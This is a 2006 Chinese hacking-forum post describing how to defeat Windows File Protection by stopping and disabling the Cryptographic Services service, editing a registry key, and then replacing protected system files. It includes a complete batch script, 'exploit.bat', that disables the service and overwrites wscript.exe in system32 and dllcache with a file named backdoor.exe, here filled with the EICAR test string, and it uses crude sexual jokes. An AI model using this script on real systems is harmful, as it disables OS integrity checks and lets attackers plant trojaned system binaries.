Author : allyesno
Team : freexploit
Date : 2006-01-20
昨晚花了好多时间写的绕过WFP保护的文章 竟然是错的 我感觉很不爽 我决定再次挑战一下wfp
擒贼先擒王 打蛇要打七寸 所以只要我们抓住了 wfp的 小jj 它就不能勃起了
wfp的小jj是谁呢 根据wfp的工作方式
引用:
在 WFP 收到受保护目录中的文件的目录更改通知后,就会触发这种保护机制。WFP 收到这一通知后,就会确定更改了哪个文件。如果此文件是受保护的文件,WFP 将在编录文件中查找文件签名,以确定新文件的版本是否正确。如果此文件的版本不正确,WFP 将使用高速缓存文件夹(如果文件位于高速缓存文件夹中)或安装源中的文件替换新文件。 |
wfp的小jj就是 编录文件 阉割了它 基本上 wfp就是废人了
怎么阉割它呢 通过查阅葵花宝典(MSDN) 欲练神功 必先自宫 我们知道 windows里面有个服务叫做 Cryptographic Services
这个服务的作用是
引用:
提供三种管理服务: 编录数据库服务,它确定 windows 文件的签名;受保护的根服务,它从此计算机添加和删除受信根证书颁发机构的证书;和密钥(Key)服务,它帮助注册此计算机获取证书。如果此服务被终止,这些管理服务将无法正常运行。如果此服务被禁用,任何依赖它的服务将无法启动。 |
干掉这个服务 就可以了 停止用 net stop 由于这个服务再电脑重启后会自动开启 所以我们用SC禁用它
重要的补充:
XP sp2 以及 2k 由luoluo的测试
[16:57] <luoluo> cs 就是 cryptsvc.dll
[16:58] <luoluo> win xp中是svchost方式运行
[16:58] <luoluo> win 2000里 services进程里可以找到这个模块
非常重要的补充:
在大家的反复测试下 发现 CS服务以及WFP的几个特性 CS服务在第一次关闭以后 会自动启用
(往后 重复启动 停止 CS都不会自动启用了)
so 我想这就是 envymask为什么测试会弹出框的原因
有两个解决的办法:
1.利用luoluo提出的替换服务 把 cs服务用其他服务替换 那么即使cs再次启动 也不能启检查作用
2.修改注册表 HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Hardware Profiles/0001/System/CurrentControlSet/Enum/ROOT/LEGACY_CRYPTSVC/0000
0值 为启用
1值 为禁用
为了彻底干掉cs服务 我们设值为1
wfp的特性 仅在系统文件被删除 或者 替换的时候 调用cs服务对其进行检测
而当我们结束cs服务 删除 或者 替换系统文件以后 再次启动cs服务 wfp不会对系统文件是否改动
做检测 所以wfp的监控 是动态的
写个bat实现 test pass in win 2003
exploit.bat
引用:
@echo off rem cheat WFP check by allyesno rem my site : http://blog.donews.com/allyesno/ rem my email : shellget@hotmail.com echo plz waiting net stop to stop net stop "Cryptographic Services" echo. echo plz waiting sc config this service sc config "cryptsvc" start= disabled echo X5O!P%%@AP[4/PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>%systemroot%/system32/dllcache/backdoor.exe echo copy /y %systemroot%/system32/dllcache/wscript.exe %systemroot%/system32/dllcache/wscript.exe.bak copy /y %systemroot%/system32/dllcache/wscript.exe %systemroot%/system32/dllcache/wscript.exe.bak echo copy /y %systemroot%/system32/dllcache/backdoor.exe %systemroot%/system32/dllcache/wscript.exe copy /y %systemroot%/system32/dllcache/backdoor.exe %systemroot%/system32/dllcache/wscript.exe echo copy /y %systemroot%/system32/dllcache/backdoor.exe %systemroot%/system32/wscript.exe copy /y %systemroot%/system32/dllcache/backdoor.exe %systemroot%/system32/wscript.exe echo yeah we finished our work echo check the %systemroot%/system32/wscript.exe by dir echo n u c the file size,Good luck test by allyesno in Win2003 n WinXP OS echo echo thx:ZeTa,envymask,10,luoluo 4 test |
my site : http://blog.donews.com/allyesno/
my email : shellget@hotmail.com (只接收纯文本方式的邮件)
特别感谢:ZeTa,envymask 在Win2003,10在2k中的测试结果
luoluo提出的 替换服务的补充 以及 在XP sp2中的测试
参考文献:
http://www.microsoft.com/china/winlogo/policies/signature-benefits.asp
http://support.microsoft.com/default.aspx?scid=kb;zh-cn;222193
http://support.microsoft.com/default.aspx?scid=kb;zh-tw;282784
http://support.microsoft.com/default.aspx?scid=kb;zh-cn;222193
附件: exploit.rar [需 0 社区元下载]
该文件已经被下载 11 次.
. . . . . . . . . . . . . . . . . .
引用:
幻影群 幻影之水 14335770 PST Project 16385798 IRC 聊天室 irc.0x557.org +9940 (ssl) #ph4nt0m #segfault xfocus.org +61111 (ssl) #sigxfocus |
由 allyesno 于 2006-01-17 07:08 PM 最后编辑